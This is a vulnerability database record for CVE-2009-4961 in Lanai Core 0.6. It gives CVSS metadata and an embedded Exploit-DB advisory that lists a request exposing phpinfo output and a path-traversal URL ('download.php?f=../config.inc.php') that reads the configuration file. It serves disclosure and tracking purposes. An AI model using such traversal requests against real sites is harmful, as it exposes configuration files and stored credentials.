ID CVE-2009-4961
Type cve
Reporter cve@mitre.org
Modified 2017-09-19T01:30:00
Description
Lanai Core 0.6 allows remote attackers to obtain configuration information via a direct request to info.php, which calls the phpinfo function.
{"id": "CVE-2009-4961", "bulletinFamily": "NVD", "title": "CVE-2009-4961", "description": "Lanai Core 0.6 allows remote attackers to obtain configuration information via a direct request to info.php, which calls the phpinfo function.", "published": "2010-07-28T14:43:00", "modified": "2017-09-19T01:30:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4961", "reporter": "cve@mitre.org", "references": ["http://www.exploit-db.com/exploits/9490"], "cvelist": ["CVE-2009-4961"], "type": "cve", "lastseen": "2020-10-03T11:54:20", "edition": 3, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:9490"]}], "modified": "2020-10-03T11:54:20", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2020-10-03T11:54:20", "rev": 2}, "vulnersScore": 5.2}, "cpe": ["cpe:/a:lanai-core:lanai-core:0.6"], "affectedSoftware": [{"cpeName": "lanai-core:lanai-core", "name": "lanai-core", "operator": "eq", "version": "0.6"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:lanai-core:lanai-core:0.6:*:*:*:*:*:*:*"], "cwe": ["CWE-200"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:lanai-core:lanai-core:0.6:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"exploitdb": [{"lastseen": "2016-02-01T10:42:02", "description": "Lanai Core 0.6 Remote File Disclosure / Info Disclosure Vulns. CVE-2009-4961. Webapps exploit for php platform", "published": "2009-08-24T00:00:00", "type": "exploitdb", "title": "Lanai Core 0.6 - Remote File Disclosure / Info Disclosure Vulns", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4961"], "modified": "2009-08-24T00:00:00", "id": "EDB-ID:9490", "href": "https://www.exploit-db.com/exploits/9490/", "sourceData": "#####################################################################################\n#### Lanai Core v 0.6 Remote File Disclosure / IG ####\n#####################################################################################\n# #\n#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #\n#Discovered by : Sina Yazdanmehr (R3d.W0rm) #\n#Our Site : http://IrCrash.com #\n#My Official WebSite : http://R3dW0rm.ir #\n#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #\n#####################################################################################\n# #\n#Download : http://garr.dl.sourceforge.net/project/lanai/Lanai%20Core/Core%206/lanai-core_v0.6.zip\n# #\n#####################################################################################\n# [IG] #\n# # \n#http://[site]/[path]/info.php #\n# #\n#####################################################################################\n# [Remote File Disclosure] #\n# #\n#http://[site]/[path]/modules/backup/download.php?f=../config.inc.php #\n# #\n###################################### TNX GOD ######################################\n\n# milw0rm.com [2009-08-24]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/9490/"}]}
